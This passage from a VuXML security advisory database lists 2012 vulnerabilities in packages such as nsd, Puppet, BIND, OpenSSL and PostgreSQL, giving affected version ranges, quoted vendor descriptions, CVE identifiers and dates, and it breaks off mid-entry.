<vuln vid="ce82bfeb-d276-11e1-92c6-14dae938ec40">
<topic>dns/nsd -- DoS vulnerability from non-standard DNS packet</topic>
<affects>
<package>
<name>nsd</name>
<range><lt>3.2.11_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Marek Vavrusa and Lubos Slovak report:</p>
<blockquote cite="http://www.nlnetlabs.nl/downloads/CVE-2012-2978.txt">
<p>It is possible to crash (SIGSEGV) an NSD child server process
by sending it a non-standard DNS packet from any host on the
internet. A crashed child process will automatically be restarted
by the parent process, but an attacker may keep the NSD server
occupied restarting child processes by sending it a stream of
such packets, effectively preventing the NSD server from serving.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2978</cvename>
<freebsdpr>ports/170024</freebsdpr>
<url>http://www.nlnetlabs.nl/downloads/CVE-2012-2978.txt</url>
</references>
<dates>
<discovery>2012-07-19</discovery>
<entry>2012-07-20</entry>
<modified>2012-07-21</modified>
</dates>
</vuln>
<vuln vid="a460035e-d111-11e1-aff7-001fd056c417">
<topic>libjpeg-turbo -- heap-based buffer overflow</topic>
<affects>
<package>
<name>libjpeg-turbo</name>
<range><lt>1.2.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="http://sourceforge.net/projects/libjpeg-turbo/files/1.2.1/README.txt">
<p>The Changelog for version 1.2.1 says: Fixed a regression caused by
1.2.0[6] in which decompressing corrupt JPEG images (specifically,
images in which the component count was erroneously set to a large
value) would cause libjpeg-turbo to segfault.</p>
</blockquote>
<blockquote cite="https://bugzilla.redhat.com/show_bug.cgi?id=826849">
<p>A Heap-based buffer overflow was found in the way libjpeg-turbo
decompressed certain corrupt JPEG images in which the component count
was erroneously set to a large value. An attacker could create a
specially-crafted JPEG image that, when opened, could cause an
application using libpng to crash or, possibly, execute arbitrary code
with the privileges of the user running the application.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2806</cvename>
<url>http://sourceforge.net/projects/libjpeg-turbo/files/1.2.1/README.txt</url>
<url>https://bugzilla.redhat.com/show_bug.cgi?id=826849</url>
</references>
<dates>
<discovery>2012-05-31</discovery>
<entry>2012-07-18</entry>
<modified>2012-07-19</modified>
</dates>
</vuln>
<vuln vid="2fe4b57f-d110-11e1-ac76-10bf48230856">
<topic>Dokuwiki -- cross site scripting vulnerability</topic>
<affects>
<package>
<name>dokuwiki</name>
<range><lt>20120125_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Secunia Research reports:</p>
<blockquote cite="http://secunia.com/advisories/49196/">
<p>Secunia Research has discovered a vulnerability in DokuWiki, which can
be exploited by malicious people to conduct cross-site scripting
attacks.</p>
<p>Input passed to the "ns" POST parameter in lib/exe/ajax.php (when "call"
is set to "medialist" and "do" is set to "media") is not properly
sanitised within the "tpl_mediaFileList()" function in inc/template.php
before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context
of an affected site.</p>
</blockquote>
</body>
</description>
<references>
<url>http://secunia.com/advisories/49196/</url>
<cvename>CVE-2012-0283</cvename>
</references>
<dates>
<discovery>2012-07-13</discovery>
<entry>2012-07-18</entry>
</dates>
</vuln>
<vuln vid="3a6960ef-c8a8-11e1-9924-001fd0af1a4c">
<topic>puppet -- multiple vulnerabilities</topic>
<affects>
<package>
<name>puppet</name>
<range><gt>2.7.*</gt><lt>2.7.18</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>puppet -- multiple vulnerabilities</p>
<blockquote cite="http://projects.puppetlabs.com/projects/puppet/wiki/Release_Notes#2.7.18">
<p>Arbitrary file read on the puppet master from authenticated
clients (high). It is possible to construct an HTTP get request
from an authenticated client with a valid certificate that will
return the contents of an arbitrary file on the Puppet master
that the master has read-access to.</p>
<p>Arbitrary file delete/D.O.S on Puppet Master from authenticated
clients (high). Given a Puppet master with the "Delete"
directive allowed in auth.conf for an authenticated host, an
attacker on that host can send a specially crafted Delete
request that can cause an arbitrary file deletion on the Puppet
master, potentially causing a denial of service attack. Note
that this vulnerability does *not* exist in Puppet as
configured by default.</p>
<p>The last_run_report.yaml is world readable (medium). The most
recent Puppet run report is stored on the Puppet master with
world-readable permissions. The report file contains the
context diffs of any changes to configuration on an agent,
which may contain sensitive information that an attacker can
then access. The last run report is overwritten with every
Puppet run.</p>
<p>Arbitrary file read on the Puppet master by an agent (medium).
This vulnerability is dependent upon vulnerability
"last_run_report.yml is world readable" above. By creating a
hard link of a Puppet-managed file to an arbitrary file that
the Puppet master can read, an attacker forces the contents to
be written to the puppet run summary. The context diff is
stored in last_run_report.yaml, which can then be accessed by
the attacker.</p>
<p>Insufficient input validation for agent hostnames (low). An
attacker could trick the administrator into signing an
attacker's certificate rather than the intended one by
constructing specially crafted certificate requests containing
specific ANSI control sequences. It is possible to use the
sequences to rewrite the order of text displayed to an
administrator such that display of an invalid certificate and
valid certificate are transposed. If the administrator signs
the attacker's certificate, the attacker can then
man-in-the-middle the agent.</p>
<p>Agents with certnames of IP addresses can be impersonated
(low). If an authenticated host with a certname of an IP
address changes IP addresses, and a second host assumes the
first host's former IP address, the second host will be treated
by the puppet master as the first one, giving the second host
access to the first host's catalog. Note: This will not be
fixed in Puppet versions prior to the forthcoming 3.x. Instead,
with this announcement IP-based authentication in Puppet &lt; 3.x
is deprecated.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3864</cvename>
<cvename>CVE-2012-3865</cvename>
<cvename>CVE-2012-3866</cvename>
<cvename>CVE-2012-3867</cvename>
<url>http://projects.puppetlabs.com/projects/puppet/wiki/Release_Notes#2.7.18</url>
<url>http://puppetlabs.com/security/cve/cve-2012-3864/</url>
<url>http://puppetlabs.com/security/cve/cve-2012-3865/</url>
<url>http://puppetlabs.com/security/cve/cve-2012-3866/</url>
<url>http://puppetlabs.com/security/cve/cve-2012-3867/</url>
</references>
<dates>
<discovery>2012-07-05</discovery>
<entry>2012-07-10</entry>
</dates>
</vuln>
<vuln vid="4c1ac2dd-c788-11e1-be25-14dae9ebcf89">
<topic>asterisk -- multiple vulnerabilities</topic>
<affects>
<package>
<name>asterisk</name>
<range><gt>10.*</gt><lt>10.5.2</lt></range>
</package>
<package>
<name>asterisk18</name>
<range><gt>1.8.*</gt><lt>1.8.13.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Asterisk project reports:</p>
<blockquote cite="https://www.asterisk.org/security">
<p>Possible resource leak on uncompleted re-invite transactions.</p>
<p>Remote crash vulnerability in voice mail application.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3812</cvename>
<url>http://downloads.digium.com/pub/security/AST-2012-010.html</url>
<url>http://downloads.digium.com/pub/security/AST-2012-011.html</url>
<url>https://www.asterisk.org/security</url>
</references>
<dates>
<discovery>2012-07-05</discovery>
<entry>2012-07-06</entry>
<modified>2012-08-30</modified>
</dates>
</vuln>
<vuln vid="c28ee9cd-916e-4dcf-8ed3-e97e5846db6c">
<topic>typo3 -- Cross-Site Scripting Vulnerability in TYPO3 Core</topic>
<affects>
<package>
<name>typo3</name>
<range><ge>4.5</ge><lt>4.5.17</lt></range>
<range><ge>4.6</ge><lt>4.6.10</lt></range>
<range><ge>4.7</ge><lt>4.7.2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Typo3 Security Report (TYPO3-CORE-SA-2012-003):</p>
<blockquote cite="https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2012-003/">
<p>TYPO3 bundles and uses an external JavaScript and Flash Upload Library
called swfupload. TYPO3 can be configured to use this Flash uploader.
Input passed via the "movieName" parameter to swfupload.swf is not
properly sanitised before being used in a call to
"ExternalInterface.call()". This can be exploited to execute arbitrary
script code in a user's browser session in context of an affected site.
The existence of the swfupload library is sufficient to be vulnerable
to the reported problem.</p>
</blockquote>
</body>
</description>
<references>
<url>http://secunia.com/advisories/49780/</url>
<url>https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2012-003/</url>
</references>
<dates>
<discovery>2012-07-04</discovery>
<entry>2012-07-06</entry>
</dates>
</vuln>
<vuln vid="fd8bac56-c444-11e1-864b-001cc0877741">
<topic>phpList -- SQL injection and XSS vulnerability</topic>
<affects>
<package>
<name>phplist</name>
<range><le>2.10.17</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Zero Science Lab reports:</p>
<blockquote cite="http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5081.php">
<p>Input passed via the parameter 'sortby' is not properly
sanitised before being returned to the user or used in SQL queries.
This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code. The param 'num' is vulnerable to a XSS issue
where the attacker can execute arbitrary HTML and script code in
a user's browser session in context of an affected site.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2740</cvename>
<cvename>CVE-2012-2741</cvename>
<bid>52657</bid>
<url>https://www.phplist.com/?lid=567</url>
<url>http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5081.php</url>
</references>
<dates>
<discovery>2012-03-21</discovery>
<entry>2012-07-02</entry>
</dates>
</vuln>
<vuln vid="aed44c4e-c067-11e1-b5e0-000c299b62e1">
<topic>FreeBSD -- Privilege escalation when returning from kernel</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.4</ge><lt>7.4_9</lt></range>
<range><ge>8.1</ge><lt>8.1_12</lt></range>
<range><ge>8.2</ge><lt>8.2_9</lt></range>
<range><ge>8.3</ge><lt>8.3_3</lt></range>
<range><ge>9.0</ge><lt>9.0_3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Problem description:</p>
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc">
<p>FreeBSD/amd64 runs on CPUs from different vendors. Due to varying
behaviour of CPUs in 64 bit mode a sanity check of the kernel may be
insufficient when returning from a system call.</p>
<p>Successful exploitation of the problem can lead to local kernel privilege
escalation, kernel data corruption and/or crash.
To exploit this vulnerability, an attacker must be able to run code with user
privileges on the target system.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-12:04.sysret</freebsdsa>
<cvename>CVE-2012-0217</cvename>
</references>
<dates>
<discovery>2012-06-12</discovery>
<entry>2012-06-27</entry>
</dates>
</vuln>
<vuln vid="fc5231b6-c066-11e1-b5e0-000c299b62e1">
<topic>FreeBSD -- Incorrect handling of zero-length RDATA fields in named(8)</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.4</ge><lt>7.4_9</lt></range>
<range><ge>8.1</ge><lt>8.1_11</lt></range>
<range><ge>8.2</ge><lt>8.2_9</lt></range>
<range><ge>8.3</ge><lt>8.3_3</lt></range>
<range><ge>9.0</ge><lt>9.0_3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Problem description:</p>
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-12:03.bind.asc">
<p>The named(8) server does not properly handle DNS resource records where
the RDATA field is zero length, which may cause various issues for the
servers handling them.</p>
<p>Resolving servers may crash or disclose some portion of memory to the
client. Authoritative servers may crash on restart after transferring a
zone containing records with zero-length RDATA fields. These would
result in a denial of service, or leak of sensitive information.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-12:03.bind</freebsdsa>
<cvename>CVE-2012-1667</cvename>
</references>
<dates>
<discovery>2012-06-12</discovery>
<entry>2012-06-27</entry>
</dates>
</vuln>
<vuln vid="185ff22e-c066-11e1-b5e0-000c299b62e1">
<topic>FreeBSD -- Incorrect crypt() hashing</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.4</ge><lt>7.4_8</lt></range>
<range><ge>8.1</ge><lt>8.1_10</lt></range>
<range><ge>8.2</ge><lt>8.2_8</lt></range>
<range><ge>8.3</ge><lt>8.3_2</lt></range>
<range><ge>9.0</ge><lt>9.0_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Problem description:</p>
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-12:02.crypt.asc">
<p>There is a programming error in the DES implementation used in crypt()
when handling input which contains characters that cannot be represented
with 7-bit ASCII.</p>
<p>When the input contains characters with only the most significant bit set
(0x80), that character and all characters after it will be ignored.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-12:02.crypt</freebsdsa>
<cvename>CVE-2012-2143</cvename>
</references>
<dates>
<discovery>2012-05-30</discovery>
<entry>2012-06-27</entry>
</dates>
</vuln>
<vuln vid="2ae114de-c064-11e1-b5e0-000c299b62e1">
<topic>FreeBSD -- OpenSSL multiple vulnerabilities</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.4</ge><lt>7.4_8</lt></range>
<range><ge>8.1</ge><lt>8.1_10</lt></range>
<range><ge>8.2</ge><lt>8.2_8</lt></range>
<range><ge>8.3</ge><lt>8.3_2</lt></range>
<range><ge>9.0</ge><lt>9.0_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Problem description:</p>
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-12:01.openssl.asc">
<p>OpenSSL fails to clear the bytes used as block cipher padding in SSL 3.0
records when operating as a client or a server that accept SSL 3.0
handshakes. As a result, in each record, up to 15 bytes of uninitialized
memory may be sent, encrypted, to the SSL peer. This could include
sensitive contents of previously freed memory. [CVE-2011-4576]</p>
<p>OpenSSL support for handshake restarts for server gated cryptography (SGC)
can be used in a denial-of-service attack. [CVE-2011-4619]</p>
<p>If an application uses OpenSSL's certificate policy checking when
verifying X509 certificates, by enabling the X509_V_FLAG_POLICY_CHECK
flag, a policy check failure can lead to a double-free. [CVE-2011-4109]</p>
<p>A weakness in the OpenSSL PKCS #7 code can be exploited using
Bleichenbacher's attack on PKCS #1 v1.5 RSA padding also known as the
million message attack (MMA). [CVE-2012-0884]</p>
<p>The asn1_d2i_read_bio() function, used by the d2i_*_bio and d2i_*_fp
functions, in OpenSSL contains multiple integer errors that can cause
memory corruption when parsing encoded ASN.1 data. This error can occur
on systems that parse untrusted ASN.1 data, such as X.509 certificates
or RSA public keys. [CVE-2012-2110]</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-12:01.openssl</freebsdsa>
<cvename>CVE-2011-4576</cvename>
<cvename>CVE-2011-4619</cvename>
<cvename>CVE-2011-4109</cvename>
<cvename>CVE-2012-0884</cvename>
<cvename>CVE-2012-2110</cvename>
</references>
<dates>
<discovery>2012-05-03</discovery>
<entry>2012-06-27</entry>
</dates>
</vuln>
<vuln vid="f45c0049-be72-11e1-a284-0023ae8e59f0">
<topic>pycrypto -- vulnerable ElGamal key generation</topic>
<affects>
<package>
<name>py-pycrypto</name>
<range><ge>2.5</ge><lt>2.6</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Dwayne C. Litzenberger of PyCrypto reports:</p>
<blockquote cite="http://lists.dlitz.net/pipermail/pycrypto/2012q2/000587.html">
<p>In the ElGamal schemes (for both encryption and signatures), g is
supposed to be the generator of the entire Z^*_p group. However, in
PyCrypto 2.5 and earlier, g is more simply the generator of a random
sub-group of Z^*_p.</p>
<p>The result is that the signature space (when the key is used for
signing) or the public key space (when the key is used for encryption)
may be greatly reduced from its expected size of log(p) bits, possibly
down to 1 bit (the worst case if the order of g is 2).</p>
<p>While it has not been confirmed, it has also been suggested that an
attacker might be able to use this fact to determine the private key.</p>
<p>Anyone using ElGamal keys should generate new keys as soon as
practical.</p>
<p>Any additional information about this bug will be tracked at
https://bugs.launchpad.net/pycrypto/+bug/985164</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2417</cvename>
<url>http://lists.dlitz.net/pipermail/pycrypto/2012q2/000587.html</url>
<url>https://bugs.launchpad.net/pycrypto/+bug/985164</url>
</references>
<dates>
<discovery>2012-05-24</discovery>
<entry>2012-06-24</entry>
</dates>
</vuln>
<vuln vid="f46c4c6a-ba25-11e1-806a-001143cd36d8">
<topic>joomla -- Privilege Escalation</topic>
<affects>
<package>
<name>joomla</name>
<range><lt>2.5.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Joomla! reported a Core Privilege Escalation:</p>
<blockquote cite="http://developer.joomla.org/security/news/470-20120601-core-privilege-escalation.html">
<p>Inadequate checking leads to possible user privilege escalation.</p>
</blockquote>
</body>
</description>
<references>
<url>http://developer.joomla.org/security/news/470-20120601-core-privilege-escalation.html</url>
</references>
<dates>
<discovery>2012-04-29</discovery>
<entry>2012-06-19</entry>
</dates>
</vuln>
<vuln vid="eb12ebee-b7af-11e1-b5e0-000c299b62e1">
<topic>clamav -- multiple vulnerabilities</topic>
<affects>
<package>
<name>clamav</name>
<range><lt>0.97.5</lt></range>
</package>
<package>
<name>clamav-devel</name>
<range><lt>20120612</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>MITRE Advisories report:</p>
<blockquote cite="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1419">
<p>The TAR parser allows remote attackers to bypass malware detection
via a POSIX TAR file with an initial [aliases] character sequence.</p>
</blockquote>
<blockquote cite="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1457">
<p>The TAR parser allows remote attackers to bypass malware detection
via a TAR archive entry with a length field that exceeds the total
TAR file size.</p>
</blockquote>
<blockquote cite="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1458">
<p>The Microsoft CHM file parser allows remote attackers to bypass
malware detection via a crafted reset interval in the LZXC header
of a CHM file.</p>
</blockquote>
<blockquote cite="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1459">
<p>The TAR file parser allows remote attackers to bypass malware
detection via a TAR archive entry with a length field
corresponding to that entire entry, plus part of the header of
the next entry.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1419</cvename>
<cvename>CVE-2012-1457</cvename>
<cvename>CVE-2012-1458</cvename>
<cvename>CVE-2012-1459</cvename>
</references>
<dates>
<discovery>2012-03-19</discovery>
<entry>2012-06-16</entry>
</dates>
</vuln>
<vuln vid="3c8d1e5b-b673-11e1-be25-14dae9ebcf89">
<topic>asterisk -- remote crash vulnerability</topic>
<affects>
<package>
<name>asterisk10</name>
<range><gt>10.*</gt><lt>10.5.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Asterisk project reports:</p>
<blockquote cite="https://www.asterisk.org/security">
<p>Skinny Channel Driver Remote Crash Vulnerability.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3553</cvename>
<url>http://downloads.digium.com/pub/security/AST-2012-009.html</url>
<url>https://www.asterisk.org/security</url>
</references>
<dates>
<discovery>2012-06-14</discovery>
<entry>2012-06-14</entry>
</dates>
</vuln>
<vuln vid="5140dc69-b65e-11e1-9425-001b21614864">
<topic>ImageMagick -- multiple vulnerabilities</topic>
<affects>
<package>
<name>ImageMagick</name>
<range><lt>6.7.6.4</lt></range>
</package>
<package>
<name>ImageMagick-nox11</name>
<range><lt>6.7.6.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>ImageMagick reports:</p>
<blockquote cite="http://www.cert.fi/en/reports/2012/vulnerability635606.html">
<p>Three vulnerabilities have been identified in ImageMagick's
handling of JPEG and TIFF files. With these vulnerabilities, it is
possible to cause a denial of service situation in the target
system.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0259</cvename>
<cvename>CVE-2012-0260</cvename>
<cvename>CVE-2012-1798</cvename>
<url>http://www.imagemagick.org/discourse-server/viewtopic.php?f=4&amp;t=20629</url>
<url>http://www.cert.fi/en/reports/2012/vulnerability635606.html</url>
</references>
<dates>
<discovery>2012-03-28</discovery>
<entry>2012-06-14</entry>
<modified>2014-04-30</modified>
</dates>
</vuln>
<vuln vid="55587adb-b49d-11e1-8df1-0004aca374af">
<topic>mantis -- multiple vulnerabilities</topic>
<affects>
<package>
<name>mantis</name>
<range><lt>1.2.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Mantis reports:</p>
<blockquote cite="http://www.openwall.com/lists/oss-security/2012/06/09/1">
<p>Roland Becker and Damien Regad (MantisBT developers) found that
any user able to report issues via the SOAP interface could also
modify any bugnotes (comments) created by other users. In a
default/typical MantisBT installation, SOAP API is enabled and any
user can sign up to report new issues. This vulnerability therefore
impacts upon many public facing MantisBT installations.</p>
<p>Roland Becker (MantisBT developer) found that the
delete_attachments_threshold permission was not being checked when
a user attempted to delete an attachment from an issue. The more
generic update_bug_threshold permission was being checked instead.
MantisBT administrators may have been under the false impression
that their configuration of the delete_attachments_threshold was
successfully preventing unwanted users from deleting
attachments.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2691</cvename>
<cvename>CVE-2012-2692</cvename>
<mlist>http://www.openwall.com/lists/oss-security/2012/06/09/1</mlist>
<mlist>http://sourceforge.net/mailarchive/forum.php?thread_name=1339229952.28538.22%40d.hx.id.au&amp;forum_name=mantisbt-dev</mlist>
</references>
<dates>
<discovery>2012-06-09</discovery>
<entry>2012-06-12</entry>
<modified>2012-06-13</modified>
</dates>
</vuln>
<vuln vid="38195f00-b215-11e1-8132-003067b2972c">
<topic>linux-flashplugin -- multiple vulnerabilities</topic>
<affects>
<package>
<name>linux-f10-flashplugin</name>
<range><lt>11.2r202.236</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Adobe reports:</p>
<blockquote cite="http://www.adobe.com/support/security/bulletins/apsb12-14.html">
<p>These vulnerabilities could cause a crash and potentially allow an attacker to take control of the affected system.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2034</cvename>
<cvename>CVE-2012-2035</cvename>
<cvename>CVE-2012-2036</cvename>
<cvename>CVE-2012-2037</cvename>
<cvename>CVE-2012-2038</cvename>
<cvename>CVE-2012-2039</cvename>
<cvename>CVE-2012-2040</cvename>
<url>http://www.adobe.com/support/security/bulletins/apsb12-14.html</url>
</references>
<dates>
<discovery>2012-06-08</discovery>
<entry>2012-06-09</entry>
</dates>
</vuln>
<vuln vid="bfecf7c1-af47-11e1-9580-4061862b8c22">
<topic>mozilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>firefox</name>
<range><gt>11.0,1</gt><lt>13.0,1</lt></range>
<range><lt>10.0.5,1</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><lt>10.0.5,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><lt>2.10</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><lt>10.0.5</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><lt>2.10</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><gt>11.0</gt><lt>13.0</lt></range>
<range><lt>10.0.5</lt></range>
</package>
<package>
<name>libxul</name>
<range><gt>1.9.2.*</gt><lt>10.0.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-34 Miscellaneous memory safety hazards (rv:13.0/ rv:10.0.5)</p>
<p>MFSA 2012-36 Content Security Policy inline-script bypass</p>
<p>MFSA 2012-37 Information disclosure though Windows file shares and shortcut files</p>
<p>MFSA 2012-38 Use-after-free while replacing/inserting a node in a document</p>
<p>MFSA 2012-39 NSS parsing errors with zero length items</p>
<p>MFSA 2012-40 Buffer overflow and use-after-free issues found using Address Sanitizer</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-3101</cvename>
<cvename>CVE-2012-0441</cvename>
<cvename>CVE-2012-1938</cvename>
<cvename>CVE-2012-1939</cvename>
<cvename>CVE-2012-1937</cvename>
<cvename>CVE-2012-1940</cvename>
<cvename>CVE-2012-1941</cvename>
<cvename>CVE-2012-1944</cvename>
<cvename>CVE-2012-1945</cvename>
<cvename>CVE-2012-1946</cvename>
<cvename>CVE-2012-1947</cvename>
<url>http://www.mozilla.org/security/known-vulnerabilities/</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-34.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-36.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-37.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-38.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-39.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-40.html</url>
</references>
<dates>
<discovery>2012-06-05</discovery>
<entry>2012-06-05</entry>
</dates>
</vuln>
<vuln vid="1e14d46f-af1f-11e1-b242-00215af774f0">
<topic>quagga -- BGP OPEN denial of service vulnerability</topic>
<affects>
<package>
<name>quagga</name>
<range><le>0.99.20.1</le></range>
</package>
<package>
<name>quagga-re</name>
<range><lt>0.99.17.10</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>CERT reports:</p>
<blockquote cite="http://www.kb.cert.org/vuls/id/962587">
<p>If a pre-configured BGP peer sends a specially-crafted OPEN
message with a malformed ORF capability TLV, Quagga bgpd process
will erroneously try to consume extra bytes from the input packet
buffer. The process will detect a buffer overrun attempt before
it happens and immediately terminate with an error message. All
BGP sessions established by the attacked router will be closed
and its BGP routing disrupted.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1820</cvename>
<url>http://www.kb.cert.org/vuls/id/962587</url>
</references>
<dates>
<discovery>2012-06-04</discovery>
<entry>2012-06-05</entry>
</dates>
</vuln>
<vuln vid="de6d8290-aef7-11e1-898f-14dae938ec40">
<topic>mail/sympa* -- Multiple vulnerabilities in Sympa archive management</topic>
<affects>
<package>
<name>sympa</name>
<range><lt>6.0.7</lt></range>
<range><gt>6.1.*</gt><lt>6.1.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>David Verdin reports:</p>
<blockquote cite="http://www.sympa.org/security_advisories#security_breaches_in_archives_management">
<p>Multiple vulnerabilities have been discovered in Sympa archive
management that allow the scenario-based authorization
mechanisms to be skipped.</p>
<p>This vulnerability allows the attacker to:</p>
<ul>
<li>display the archives management page ('arc_manage')</li>
<li>download the list's archives</li>
<li>delete the list's archives</li>
</ul>
</blockquote>
</body>
</description>
<references>
<url>http://www.sympa.org/security_advisories#security_breaches_in_archives_management</url>
</references>
<dates>
<discovery>2012-05-15</discovery>
<entry>2012-06-05</entry>
</dates>
</vuln>
<vuln vid="1ecc0d3f-ae8e-11e1-965b-0024e88a8c98">
<topic>dns/bind9* -- zero-length RDATA can cause named to terminate, reveal memory</topic>
<affects>
<package>
<name>bind99</name>
<range><lt>9.9.1.1</lt></range>
</package>
<package>
<name>bind98</name>
<range><lt>9.8.3.1</lt></range>
</package>
<package>
<name>bind97</name>
<range><lt>9.7.6.1</lt></range>
</package>
<package>
<name>bind96</name>
<range><lt>9.6.3.1.ESV.R7.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>ISC reports:</p>
<blockquote cite="http://www.isc.org/software/bind/advisories/cve-2012-1667">
<p>Processing of DNS resource records where the rdata field is zero length
may cause various issues for the servers handling them.</p>
<p>Processing of these records may lead to unexpected outcomes. Recursive
servers may crash or disclose some portion of memory to the client.
Secondary servers may crash on restart after transferring a zone
containing these records. Master servers may corrupt zone data if the
zone option "auto-dnssec" is set to "maintain". Other unexpected
problems that are not listed here may also be encountered.</p>
<p>Impact: This issue primarily affects recursive nameservers.
Authoritative nameservers will only be impacted if an administrator
configures experimental record types with no data. If the server is
configured this way, then secondaries can crash on restart after
transferring that zone. Zone data on the master can become corrupted if
the zone with those records has named configured to manage the DNSSEC
key rotation.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1667</cvename>
<url>http://www.isc.org/software/bind/advisories/cve-2012-1667</url>
</references>
<dates>
<discovery>2012-06-04</discovery>
<entry>2012-06-04</entry>
<modified>2012-06-06</modified>
</dates>
</vuln>
<vuln vid="a8864f8f-aa9e-11e1-a284-0023ae8e59f0">
<topic>databases/postgresql*-server -- crypt vulnerabilities</topic>
<affects>
<package>
<name>postgresql-server</name>
<range><gt>8.3.*</gt><lt>8.3.18_1</lt></range>
<range><gt>8.4.*</gt><lt>8.4.11_1</lt></range>
<range><gt>9.0.*</gt><lt>9.0.7_2</lt></range>
<range><gt>9.1.*</gt><lt>9.1.3_1</lt></range>
<range><gt>9.2.*</gt><lt>9.2.b1_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The PostgreSQL Global Development Group reports:</p>
<blockquote cite="http://www.postgresql.org/about/news/1397/">
<p>Today the PHP, OpenBSD and FreeBSD communities announced updates to
patch a security hole involving their crypt() hashing algorithms. This
issue is described in CVE-2012-2143. This vulnerability also affects a
minority of PostgreSQL users, and will be fixed in an update release on
June 4, 2012.</p>
<p>Affected users are those who use the crypt(text, text) function
with DES encryption in the optional pg_crypto module. Passwords
affected are those that contain characters that cannot be
represented with 7-bit ASCII. If a password contains a character
that has the most significant bit set (0x80), and DES encryption
is used, that character and all characters after it will be ignored.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2143</cvename>
<url>http://www.postgresql.org/about/news/1397/</url>
